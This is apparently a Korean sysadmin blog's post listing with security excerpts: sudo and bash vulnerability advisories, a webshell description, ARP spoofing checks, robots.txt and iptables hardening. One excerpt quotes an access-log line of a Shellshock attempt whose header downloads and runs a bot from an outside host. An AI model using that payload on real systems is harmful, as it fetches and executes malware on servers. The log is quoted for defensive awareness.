admin 2023.07.11 sudo – Heap buffer overflow 취약점 Baron Samedit [CVE-2021-3156] sudo 취약점 부분 [crayon-670ec6946e5c9069574432/] 위와 같이 세그멘테이션 오류 또는 Segmentation fault 표시가 되면 취약점이 발생 업데이트 부분 [crayon-670ec6946e5d2759790700/] 업데이트 후 확인 [crayon-670ec6946e5d7202738021/] 업데이트 필수 Read More..
+ admin 2020.01.14 웹쉘 Ani Shell 웹쉘은 어느 서버에든지 언제든지 취약점만 있으면 업로드가 가능하다 이번에 발견된 웹쉘 webshell ani shell 기본 접속화면 패스워드는 해당 파일을 열어보면 아이디와 패스워드를 확인이 가능하다 기본 접속화면 아이디와 패스워드를 입력하면 ani shell 화면이 출력된다 기본 파일을 확인 할수 있으면 서버의 정보 및 업로드 및 ddos 메일 보내기등 다양하게 웹에서 서버를 컨트롤 할수 있다. ddos도 가능하게 되어 있는 웹쉘 화면 메일 보내기도 가능하다 해당 서버에 메일서버가 설치되어 있다면 웹 폼을 이용해서 메일을 발송할 수 있다. 대량 메일을 발송할수 있는점.. 기본 디렉토리에 내에 파일이 수정한 가능한 파일을 찾아 해당 파일 중간에 소스코드를 입력 할 수 도 있다. Read More..
+ admin 2014.09.29 bash 웹을 이용한 서버 해킹 시도 218.145.31.50 219.232.239.33 – – [29/Sep/2014:08:48:15 +0900] “GET / HTTP/1.0” 200 238 “-” “() { :;}; /bin/bash -c \”wget http://stablehost.us/bots/regular.bot -O /tmp/sh;curl -o /tmp/sh http://stablehost.us/bots/regular.bot;sh /tmp/sh;rm -rf /tmp/sh\”” 218.145.31.50 – Read More..
admin 2014.09.26 bash 취약점 (임의코드 실행취약점 보안업데이트 권고) 개요 • 리눅스계열등운영체제에서사용중인GNU Bash에서발생하는임의코드실행취약점(CVE-2014-6271) 보안업데이트를우회하여악용할수있는취약점발생(CVE-2014-7169) • 공격자는해당취약점이존재하는시스템을대상으로원격에서악의적인시스템명령을실행시킬수있으므로 해결방안에따라보안업데이트적용권고 해당시스템 • 영향받는시스템 ◦GNU Bash를사용하는시스템 해결방안 • 해당취약점에대한보안업데이트가공개된OS를운영하고있을경우, 참고사이트의내용을참조하여 보안업데이트수행 ◦CentOS[1] ◦Debian[2] ◦Redhat[3] ◦Ubuntu [4] 용어정리 • Shell : 사용자가입력한문장을해석하여시스템기능을수행하는명령어해석기 기타문의사항 • 한국인터넷진흥원인터넷침해대응센터: 국번없이118 [참고사이트] [1] ht... Read More..
admin 2011.08.29 ARP Spoofing 대처법 arp -a 위 명령으로 Gateway의 IP Address와 MAC Address를 확인할 수 있다.여러차례 확인을 하다가 다른 MAC Address가 나타나면 ARP Spoofing으로 생각할 수 있겠다.이렇게 ARP Spoofing공격을 받는 경우 서버내의 웹사이트에 클라이언트가 접속할때 본래의 Gateway가 아닌 변조된 Gateway를 통해 데이터가 오가게되며 이때 해당 소스에는 iframe을 이용한 혹은 여러가지 방법의 다른 패킷이 심어질수도 있다.클라이언트들은 자신들도 모르게 악성코드에 감염될수도 있는것이다.서버에 iptables, mod_security등을 이용해 보안대책을 세우는 것이 좋지만 여의치 않을 경우 우선적으로 아래의 조치를 취할 수 있다.먼저 서버의 원래 Gateway의 MAC A... Read More..
admin 2010.11.19 BOT 아이피리스트 (검색 bot 아이피) http://iplists.com/http://iplists.com/google.txthttp://iplists.com/inktomi.txthttp://iplists.com/lycos.txthttp://iplists.com/infoseek.txthttp://iplists.com/altavista.txthttp://iplists.com/excite.txthttp://iplists.com/misc.txthttp://iplists.com/non_engines.txt Read More..
admin 2010.11.19 검색 로봇 막기 (검색 bot 막기) robots.txt 사용하려면 홈페이지 최고 상단 / 에 올려놓으시면됩니다. 참고로 robots.txt 있다고 해서 모든 로봇을 막을수는 없습니다. 그냥 뚤고 지나가는 로봇도 있습니다. * 아래와 같이 설정하시면 모든 검색엔진에 대해서 막는다는 뜻입니다. robots.txt ———————- User-agent: * Disallow: / ———————- 모든 검색엔진 허용하기 ——————— User-agent: * Disallow: ——————- 특정 검색엔진 막기 아래와 같이 특정 검색 로봇 이름명을 적어주시면됩니다. //네이버 로봇 막기 ——————— User-agent: cowbot Disallow: / ——————- //구글 로봇 막기 ——————– User-agent: Googlebot Disa... Read More..
admin 2010.07.13 Flooding in SYN and IP Tables #!/bin/bash/sbin/modprobe ip_tables/sbin/modprobe ip_conntrack/sbin/modprobe ip_conntrack_ftprm /root/.dyn*echo “Setting kernel tcp parameters to reduct DoS effects”#Reduce DoS’ing ability by reducing timeoutsecho 30 > /proc/sys/net/ipv4/tcp_fin_timeoutecho 1800 > /proc/sys/net/ipv4/tcp_keepalive_timeecho 1 > /proc/sys/net/ipv4/tcp_window_scalingecho 0 > /proc/sys/net/ipv4/tcp_sackecho 1280 > /pro... Read More..
+ admin 2010.06.24 Layer 7 Traffic Control (set up ) How to set up Layer 7 Traffic Control How to set up Layer 7 Traffic Control Resources Prerequisites Patching the kernel Patching iptables Testing the setup Traffic Control Script IP Accounting Dependencies Setting up pmacct and pmgraph pmacct pmgraph Resources Some resources that greatly helped to figure this stuff outL7-HomepageLARTC-GuideFreifunk-WikiHTB Linux queue manualHTB How To Prerequisite... Read More..
admin 2010.03.30 oops-firewall 설치 (rpmbuild) 환경 : centos 5.x (64bit)1. oops 소스 다운로드 [root@localhost ~]# wget ftp://mirror.oops.org/pub/oops/oops-firewall/oops-firewall-6.2.6.tar.bz22. 다운로드 받은 파일 rpm 파일 만들기 [root@localhost ~]# rpmbuild -tb oops-firewall-6.2.6.tar.bz2..생략작성: /usr/src/redhat/RPMS/noarch/oops-firewall-6.2.6-1.noarch.rpm작성: /usr/src/redhat/RPMS/noarch/oops-firewall-doc-6.2.6-1.noarch.rpm실행 중(%clean): /bin/sh -e /var/tmp/rpm-tmp.6... Read More..